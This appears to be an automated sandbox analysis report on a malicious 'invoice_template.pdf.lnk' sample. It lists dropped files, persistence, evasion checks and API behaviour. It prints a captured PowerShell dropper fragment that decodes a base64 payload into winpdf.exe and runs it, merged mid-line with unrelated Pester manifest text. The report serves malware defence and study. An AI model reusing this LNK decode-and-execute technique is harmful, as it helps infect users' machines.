        Source: WalletService.dll1.25.drStatic PE information: section name: .didat
        Source: Windows.ApplicationModel.Wallet.dll6.25.drStatic PE information: section name: .didat
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA7ED83778 push eax; iretd 0_2_00007FFA7ED83781
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA7ED800BD pushad ; iretd 0_2_00007FFA7ED800C1
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002D8B75 push ecx; ret 13_2_002D8B88
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002CCBDB push eax; retf 13_2_002CCBF8
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002D8B75 push ecx; ret 15_2_002D8B88
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002CCBDB push eax; retf 15_2_002CCBF8
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_004032D9 push edx; retf 15_2_004032DE
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_004032D9 push eax; ret 15_2_004033B9
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_00401B54 push edi; iretd 15_2_00401B58
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00908B75 push ecx; ret 17_2_00908B88

        Persistence and Installation Behavior

        barindex
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
        Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
        Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
        Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\367647\Productive.pifJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed\Windows.ApplicationModel.Wallet.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\744\C\Windows\System32\WalletBackgroundServiceProxy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\744\C\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\winpdf.exeJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\367647\Productive.pifJump to dropped file
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fejhsitJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\Windows.ApplicationModel.Wallet.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_5f44912b33b38332\WalletProxy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d\WalletProxy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_fa16cd4ceba3021a\WalletBackgroundServiceProxy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\wow64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_046b779f2003c415\WalletBackgroundServiceProxy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\744\C\Windows\System32\Windows.ApplicationModel.Wallet.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\744\C\Windows\SysWOW64\WalletProxy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-w..-service.deployment_31bf3856ad364e35_10.0.19041.985_none_b6bad888bc038c2c\WalletService.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-w..t-service.resources_31bf3856ad364e35_10.0.19041.1_en-us_0e357aa451e0d2d7\WalletService.dll.muiJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\744\C\Windows\SysWOW64\WalletBackgroundServiceProxy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\744\C\Windows\System32\WalletProxy.dllJump to dropped file
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fejhsitJump to dropped file

        Boot Survival

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk).Line -replace 'aDuck';Set-Content $env:temp\winpdf.exe -Encoding Byte -Value @([System.Convert]::FromBase64String($b64)); invoke-item $env:temp\winpdf.exe@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\fejhsit:Zone.Identifier read attributes | deleteJump to behavior
        Source: Possible double extension: pdf.lnkStatic PE information: invoice_template.pdf.lnk
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_003359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,13_2_003359B3
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,13_2_002C5EDA
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_003359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,15_2_003359B3
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_002C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,15_2_002C5EDA
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_009659B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,17_2_009659B3
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_008F5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,17_2_008F5EDA
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_002D33B7 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_002D33B7
        Source: C:\Users\user\AppData\Roaming\fejhsitRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Users\user\AppData\Roaming\fejhsitRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\fejhsitProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\fejhsitProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\fejhsitProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\fejhsitProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\fejhsitProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\fejhsitProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\fejhsitProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\fejhsitProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\fejhsitProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\fejhsitProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\fejhsitProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\fejhsitProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifAPI/Special instruction interceptor: Address: 7FFAF154E634
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifAPI/Special instruction interceptor: Address: 7FFAF154D3A4
        Source: Productive.pif, 0000000F.00000002.20019477384.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKG
        Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9910Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 421Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 960Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1154Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5671Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 456Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 458Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 404Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 393Jump to behavior
        Source: C:\Users\user\AppData\Roaming\fejhsitWindow / User API: foregroundWindowGot 1724
        Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 9690
        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9702
        Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 9693
        Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9693
        Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_a953dd8b163491ed\Windows.ApplicationModel.Wallet.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\744\C\Windows\System32\WalletBackgroundServiceProxy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\744\C\Windows\SysWOW64\Windows.ApplicationModel.Wallet.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\wow64_microsoft-windows-wallet-winrt_31bf3856ad364e35_10.0.19041.746_none_b3a887dd4a9553e8\Windows.ApplicationModel.Wallet.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_5f44912b33b38332\WalletProxy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\wow64_microsoft-windows-wallet-service.proxy_31bf3856ad364e35_10.0.19041.1_none_69993b7d6814452d\WalletProxy.dllJump to dropped file
        Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\744\C\Windows\WinSxS\amd64_microsoft-windows-w..ice.backgroundproxy_31bf3856ad364e35_10.0.19041.1_none_fa16cd4ceba3021a\WalletBackgroundServiceProxy.dllJump to dropped file
